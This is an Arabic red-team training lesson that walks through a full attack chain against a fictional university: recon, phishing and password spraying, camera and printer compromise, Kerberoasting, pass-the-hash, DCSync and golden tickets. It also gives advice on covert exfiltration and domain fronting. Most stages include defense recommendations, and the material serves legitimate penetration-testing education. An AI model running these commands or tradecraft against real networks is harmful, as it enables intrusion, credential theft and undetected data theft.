Cyber Operations Academy logo
أكاديمية العمليات السيبرانية
Red / Blue / Ops
الرئيسية/الدروس/L66
الفرق الحمراء — الهجومخبير150mL66

سلسلة هجوم كاملة من A إلى Z — جامعة وأجهزة IoT

من الاستطلاع إلى السيطرة الكاملة، مع كاميرات وطابعات وقارئات بطاقات

#Kill Chain#University#IoT#Cameras#Printers#Pivot

السيناريو — جامعة state-uni.edu

هذا الدرس يجمع كل ما تعلّمته في "فيلم" واحد. الهدف: state-uni.edu (وهمية، RFC 2606). فريق أحمر مفوّض كتابياً من إدارة الجامعة لتقييم: نظام التسجيل، شبكة الكاميرات، الطابعات الإدارية، قارئات البطاقات. الفترة: 6 أسابيع. النطاق: كل شيء داخل 203.0.113.0/24 و198.51.100.0/24 (RFC 5737).

تشبيه — شرح مبسط
الجامعات هدف ذهبي للهجوم: شبكات مفتوحة بطبيعتها، آلاف الأجهزة غير مُدارة (حواسيب طلاب، IoT)، تمويل أبحاث حساسة (دفاعية أحياناً)، وإدارة IT بميزانية محدودة. كل APT حقيقية درست هذا — Cozy Bear (روسيا) و TA413 (الصين) و Charming Kitten (إيران) لديها حملات جامعية موثّقة.
حدود قانونية
كل خطوة في هذا الدرس قانونية فقط ضد الهدف الوهمي أو ضد جامعة وقّعت عقد pentest. اختبار أي تقنية على شبكة جامعتك الفعلية بدون تفويض = جناية CFAA + احتمال طرد + حظر مدى الحياة من العمل الفيدرالي.

خريطة السلسلة الكاملة (A → Z)

A. Recon — الاستطلاع السلبي
OSINT، subdomains، LinkedIn للموظفين، شودان للأجهزة المعرّضة.
B. Active scanning
Nmap، Nuclei، فحص بنية AD وSSO.
C. Initial access
Phishing لطالب/موظف، أو ثغرة ويب على بوابة التسجيل.
D. Foothold
Webshell، أو دخول VPN بكلمة سر مسرّبة.
E. Internal recon
BloodHound على AD، رسم الـ subnets الداخلية.
F. IoT pivot
كاميرات + طابعات = نقاط استمرار جديدة.
G. Privilege escalation
Kerberoasting، NTLM relay، LAPS misconfig.
H. Lateral movement
PsExec، WinRM، عبر VLANs ضعيفة العزل.
I. Domain dominance
DCSync على Domain Controller.
J. Crown jewels
نظام التسجيل، قاعدة بيانات الأبحاث، خوادم البريد.
K-Y. Persistence + exfil
Golden ticket، scheduled tasks، استخراج بطيء.
Z. Cleanup + report
إزالة آثار، تقرير كامل للعميل، توصيات.

A — الاستطلاع السلبي (الأسبوع 1)

القاعدة: لا حزمة واحدة تجاه state-uni.edu في هذه المرحلة. كل المعلومات من مصادر ثالثة.

$ # subdomains من شهادات SSL العامة:
$ curl -s 'https://crt.sh/?q=%25.state-uni.edu&output=json' | jq -r '.[].name_value' | sort -u
registrar.state-uni.edu library.state-uni.edu vpn.state-uni.edu cameras.state-uni.edu print-srv.state-uni.edu badge.state-uni.edu
$ # Shodan لأجهزة الجامعة المعرّضة (يحتاج اشتراك):
$ shodan search 'org:"State University" port:554' # RTSP cameras
$ shodan search 'org:"State University" port:631' # IPP printers
$ shodan search 'org:"State University" port:9100' # Raw print
$ # LinkedIn للموظفين — أسماء IT/إداريين بصلاحيات عالية:
$ # (يدوي عبر Sales Navigator أو theHarvester)
$ theHarvester -d state-uni.edu -b linkedin,bing,duckduckgo
الدفاع — تقليل سطح الـ OSINT
  • إزالة شعار الجامعة من Shodan (bug bounty لقطات منه).
  • سياسة LinkedIn للموظفين: لا تُنشر سلطات تقنية محددة.
  • مراقبة crt.sh الخاص بنطاقك — كل شهادة جديدة = تنبيه لـ SOC.
  • Continuous Attack Surface Management (ASM): أدوات مثل Censys, runZero ترى ما يراه المهاجم.

B — الفحص النشط (نهاية الأسبوع 1)

bash
# 1) فحص شامل لكل المنافذ على نطاقات الجامعة:
nmap -sS -p- --min-rate 5000 -oA full-scan 203.0.113.0/24

# 2) تحديد الخدمات والإصدارات لكل ميناء مفتوح:
nmap -sV -sC -p 22,80,443,445,554,631,3389,5985,8080 -oA service-scan 203.0.113.0/24

# 3) Nuclei لـ CVEs معروفة:
nuclei -l live-hosts.txt -t cves/ -severity critical,high -o nuclei-results.txt

# 4) BBOT لـ recon آلي شامل:
bbot -t state-uni.edu -f passive,subdomain-enum,web-basic

النتائج المثالية على هدف ضعيف: VPN قديم (Pulse/Fortinet/Citrix بـ CVE قديم)، Outlook Web Access مكشوف، Confluence/Jira داخلية على الإنترنت، وكاميرات IP بدون مصادقة.

C — الوصول الأولي (Initial Access)

3 طرق رئيسية على بيئة جامعية:

01
Phishing لطالب أو موظف

طالب جديد + بوابة دخول مزيفة لـ "portal.state-uni.edu" على نطاق portal-state-uni.edu (شرطة، لا نقطة) = 30%+ click rate في حملات حقيقية. EvilGinx2 أو Modlishka يلتقطان الجلسة بعد MFA (AiTM).

02
ثغرة ويب على بوابة التسجيل

أنظمة التسجيل الجامعية (Banner, PeopleSoft Campus, Workday Student) كثيراً ما يكون فيها custom code قديم. SQLi على نموذج بحث الطلاب → استخراج hashes → الدخول كأي مستخدم.

03
VPN بـ password spraying

أكثر طريق فعّال: قائمة أسماء مستخدمين من LinkedIn + كلمة سر موسمية (Spring2026!). 3-7% من الموظفين يستخدمون مثلها. SprayingToolkit ضد بوابة OWA أو VPN.

الدفاع
  • MFA إجباري + FIDO2 keys لـ admins (يقاوم phishing).
  • Conditional Access: refuse logins from non-corporate IPs without device compliance.
  • Lockout بعد 5 محاولات + جدار حماية لـ IPs غير معتادة.
  • تدريب phishing شهري + تقارير سهلة ("Report Phish" زر في Outlook).

D — موطئ القدم

دخلنا. الآن جلسة على workstation موظف "مكتب التسجيل". الهدف: تثبيت بصمة لكن دون أن نُلاحَظ.

  • لا تُسقط ثنائية. استخدم PowerShell + WMI الأصلية.
  • سجّل المستخدم نفسه: ما البرامج التي يفتحها؟ متى؟ هذا توقيع "طبيعية الجلسة" نقلّده.
  • أضف نفسك كـ scheduled task يعمل عند login فقط (لا boot — أوضح).

E — استطلاع داخلي + BloodHound

لحظة الذهب: AD بأكملها أمامك. BloodHound + SharpHound يخططان كل علاقة:

$ # جمع بيانات AD من workstation موظف عادي:
$ SharpHound.exe -c All --zipfilename uni-data.zip
$ # في BloodHound GUI، استعلامات ذهبية:
$ # 1) أقصر مسار من "Domain Users" إلى "Domain Admins"
$ # 2) كل user مع SPN (هدف Kerberoasting)
$ # 3) أجهزة بـ "Unconstrained Delegation"
$ # 4) GPOs قابلة للتعديل من حسابي

على شبكة جامعية متوسطة، BloodHound يكشف عادة 3-5 مسارات لـ Domain Admin خلال دقائق. السبب: حسابات service قديمة، delegation سيء، وعضوية مجموعات متراكمة.

F — التحوّل عبر IoT — كاميرات وطابعات

هنا الجزء الذي سألت عنه. لماذا IoT؟ لأنها: (1) لا EDR عليها، (2) كلمات سر افتراضية شائعة، (3) لا أحد يحدّث firmware، (4) متصلة بـ VLANs "داخلية" أعمق من workstations.

الكاميرات IP — التقاط، إنكار، نقطة استمرار

bash
# 1) اكتشاف كاميرات RTSP في شبكة الجامعة:
nmap -p 554,8554,80,8080 --script rtsp-url-brute 198.51.100.0/24

# 2) تجربة بيانات اعتماد افتراضية (Hikvision/Dahua/Axis):
hydra -L users.txt -P common-camera-pass.txt 198.51.100.42 rtsp
# users.txt: admin, root, service, supervisor
# common: admin, 12345, password, hikvision, dahua, root

# 3) ffmpeg لقراءة البث المباشر:
ffmpeg -i rtsp://admin:admin@198.51.100.42:554/Streaming/Channels/101 -t 30 sample.mp4

أهم CVEs على كاميرات الحرم الجامعي (تاريخياً):

  • CVE-2017-7921 (Hikvision) — تجاوز مصادقة بمجرد إضافة ?auth=YWRtaW46MTEK.
  • CVE-2021-36260 (Hikvision) — RCE بدون مصادقة. أعطى Mirai-variants سيطرة على ملايين الكاميرات.
  • CVE-2022-30563 (Dahua) — تجاوز مصادقة عبر إعادة تشغيل ONVIF.

لماذا الكاميرا قيّمة كنقطة استمرار: Linux صغير على ARM، يمكن تثبيت implant دائم في firmware. لا EDR. تعيش لسنوات. APT أمريكية وصينية موثّق استخدامها لكاميرات كـ "صناديق برمجية" على شبكات الهدف.

الطابعات — أكثر هدف غير مُقدّر في الشبكة

الطابعات MFP (Xerox, HP, Canon, Konica) هي حواسيب كاملة بـ Linux داخلها. تخزّن: نسخ من كل مستند مسحه أحد، بيانات اعتماد LDAP لكي تطبع "Print Anywhere"، شهادات Kerberos.

bash
# 1) PRET — Printer Exploitation Toolkit (open source)
pip install colorama
git clone https://github.com/RUB-NDS/PRET && cd PRET
python pret.py 198.51.100.50 ps   # عبر PostScript

# داخل shell PRET:
ls /                    # تصفح ملفات الطابعة
cat /home/printer/jobs  # قد يحوي مستندات سابقة!
get /etc/passwd

# 2) IPP exploit — أحياناً RCE بدون مصادقة:
nmap -p 631 --script ipp-info 198.51.100.0/24

# 3) Print job capture — تنصّت على ما يطبعه الناس:
# (في مختبر): اعتراض port 9100 و حفظ الـ PostScript

سبب أهمية الطابعة:

  • تحوي LDAP bind credentials للوصول إلى دفتر العناوين — بحساب نطاق فعلي. سرقتها = حساب AD صالح.
  • طابعة في "مكتب الرئيس" طبعت النسخة الأصلية من كل وثيقة سرية مرّت. الذاكرة الداخلية تحفظ النسخ.
  • PrinterNightmare (CVE-2021-34527) ضد Print Spooler يحوّل أي مستخدم نطاق إلى SYSTEM على الـ DC.

قارئات البطاقات والتحكم بالأبواب

أنظمة Lenel, Genetec, HID Global. غالباً MSSQL خلفية + شبكة منفصلة لكنها تُربط بـ corporate لـ "سهولة الإدارة".

  • HID iCLASS / Prox قابلة للنسخ بـ Proxmark3 ($300) في 5 ثوان. اختبار في غرفة المصاعد، تستنسخ بطاقة موظف، تدخل أي مكان.
  • قواعد بيانات Lenel فيها كثيراً sa بكلمة سر افتراضية.
  • API الـ Genetec أحياناً مفتوح على الشبكة الداخلية بدون مصادقة كافية → فتح أي باب عن بُعد.

أجهزة عرض VoIP وSmart TVs والمختبرات

  • هواتف Cisco/Polycom: lots of CVEs قديمة، telnet مفتوح أحياناً، يمكن تحويلها لـ "ميكروفون" دائم.
  • أجهزة عرض ذكية: Android قديم جداً، WiFi مفتوح، يمكن استخدامها كـ pivot box.
  • أنظمة BMS (مكيفات، إضاءة): BACnet بدون authentication. ليست مفيدة هجومياً مباشرة، لكنها "شبكة موازية" تتجاوز firewall أحياناً.
الدفاع — على IoT
  • VLAN segmentation صارمة: كاميرات وطابعات وBMS كل واحد في VLAN منفصل، لا تتكلم مع corporate إلا عبر firewall بقواعد محددة.
  • تغيير افتراضات قبل التركيب — كلمة سر، شهادة، SNMP community.
  • Firmware updates روتينية — أكثر الكاميرات/الطابعات لا تُحدّث منذ التركيب.
  • NAC (802.1X) حتى للأجهزة — كاميرا غير مسجلة لا تحصل على IP.
  • Network detection لـ traffic غريب من IoT (كاميرا تتكلم بـ DNS لنطاقات خارجية = أحمر).
  • Asset inventory دقيق — كم كاميرا لديك؟ كم طابعة؟ بدون رقم، لا تحمي.

G — رفع الصلاحيات — Kerberoasting

أبسط طريق على شبكة جامعية: حسابات الخدمة (SPN) لها كلمات سر قديمة لم تُغيّر منذ سنوات.

bash
# 1) قائمة كل حسابات SPN:
GetUserSPNs.py state-uni.edu/student.user:Pass123 -dc-ip 203.0.113.10 -request

# 2) النتيجة: TGS tickets قابلة للكسر offline:
hashcat -m 13100 spn-hashes.txt rockyou.txt -r best64.rule

# 3) كلمة سر "Library2019!" لحساب "sql_svc" → MSSQL admin → xp_cmdshell → SYSTEM
الدفاع
  • كلمات سر طويلة (25+ حرف) لكل حساب SPN.
  • Group Managed Service Accounts (gMSA) — Windows يدير الكلمة آلياً.
  • Honeytokens: حساب SPN فخّ لا يستخدمه أحد، أي طلب TGS له = APT داخل.

H — التحرك الجانبي عبر VLANs

الجامعات "مفتوحة" ثقافياً، VLAN segmentation ضعيف. workstation موظف يكلم printer admin VLAN يكلم camera VLAN. كل قفزة تستخدم كلمة سر جديدة من الطبقة السابقة.

$ # Pass-the-hash من workstation إلى print server:
$ psexec.py -hashes :aad3b...:31d6cf... administrator@198.51.100.50
$ # WinRM إلى file server:
$ evil-winrm -i 198.51.100.60 -u svc_backup -H 4f3d...

I — السيطرة على النطاق (Domain Dominance)

بعد الوصول لحساب Domain Admin (عبر Kerberoasting أو NTLM relay على PetitPotam):

bash
# DCSync — استخراج كل hashes النطاق من DC:
secretsdump.py state-uni.edu/admin@dc01.state-uni.edu -just-dc

# النتيجة: hashes كل حساب، بما فيها حساب krbtgt (the keys to the kingdom).
# Golden Ticket = استمرار حتى لو غيّر admin كلمته:
ticketer.py -nthash <krbtgt-hash> -domain-sid <SID> -domain state-uni.edu admin
الدفاع — الذي يعمل فعلاً
  • Tier 0/1/2 isolation: Domain Admin لا يسجّل دخول إلا على DC.
  • تدوير hash krbtgt مرتين سنوياً (يبطل golden tickets قديمة).
  • Microsoft LAPS + Privileged Access Management (PAM).
  • Defender for Identity يصطاد DCSync بدقة عالية.

J — الجواهر — الأهداف الحقيقية في جامعة

  1. Banner / PeopleSoft — قاعدة بيانات الطلاب: أسماء، SSN، MFAs، شهادات.
  2. Research data — أبحاث ممولة فيدرالياً (DARPA, DoE, NIH). الجواهر الحقيقية للـ APT.
  3. Financial systems — رواتب، منح، payroll redirects.
  4. Email (Exchange/M365) — كل شيء يمر هنا. صلاحيات admin تعطي impersonation.
  5. Lab networks — أحياناً ICS صغير (مفاعلات تعليمية، biosafety labs). أعلى حساسية.

K → Y — الاستمرار والاستخراج

  • Persistence: Golden ticket + scheduled task + WMI subscription + webshell على بوابة فرعية.
  • Tiered access: 3 طبقات منفصلة كما في درس web-vuln-research.
  • Exfil: لا تخرج 50GB دفعة واحدة. Rclone إلى حساب OneDrive للجامعة نفسها (يبدو شرعياً) بمعدل 5GB/يوم على مدى أسابيع.
  • Beacons داخل ساعات عمل الحرم فقط، عبر domain fronting لـ Cloudflare/Azure.

Z — التنظيف وتقرير العميل

  • إزالة كل الأدوات المؤقتة (لكن احتفظ بـ logs لتسليم العميل).
  • إعادة كلمات السر التي عدّلتها لقيم سابقة (لا تكسر الإنتاج).
  • تقرير: timeline دقيق، كل CVE، كل خطأ تكوين، كل كلمة سر ضعيفة، كل IoT مكشوف.
  • توصيات بأولويات: ما يجب إصلاحه في أسبوع، شهر، ربع.
  • retest بعد الإصلاحات (بعد 90 يوماً عادة).

MITRE ATT&CK Mapping للسلسلة كاملة

text
Recon:        T1595 (Active Scanning), T1589 (Gather Victim Identity)
Initial:      T1566.001 (Spearphishing), T1190 (Public-Facing Exploit), T1110.003 (Spraying)
Execution:    T1059.001 (PowerShell), T1059.003 (Cmd)
Persistence:  T1053.005 (Scheduled Task), T1505.003 (Webshell), T1136 (New Account)
Priv Esc:     T1558.003 (Kerberoasting), T1068 (Exploitation for Priv Esc)
Defense Evd:  T1027 (Obfuscation), T1070.004 (File Deletion)
Credentials:  T1003.001 (LSASS), T1003.006 (DCSync)
Discovery:    T1018 (Remote System), T1087 (Account Discovery)
Lateral:      T1021.002 (SMB), T1021.006 (WinRM), T1550.002 (PtH)
Collection:   T1005 (Local Data), T1213 (Internal Repo)
C2:           T1071.001 (Web), T1090 (Proxy), T1568 (Dynamic Resolution)
Exfil:        T1567.002 (Cloud Storage), T1041 (Over C2)
Impact:       T1486 (Encrypt) — لا في تدريب، فقط documentation

حالات حقيقية للدراسة

  • UC San Diego / UCSF (2020) — ransomware عبر phishing → DCSync → تشفير.
  • Newcastle University (2020) — DoppelPaymer، 6 أشهر استرداد.
  • MIT lab pivot via printer (2017) — الباحثون أظهروا hop من طابعة Konica إلى DC.
  • IoT botnet Mirai (2016) — كاميرات Hikvision في حرم جامعي شاركت في DDoS.
  • Operation Newscaster (Charming Kitten) — phishing لباحثين أكاديميين أمريكيين موثّق منذ 2014.
السابق
بناء هجمات USB في المختبر — أمثلة عملية
التالي
أمن Node.js و Express — استغلال متقدم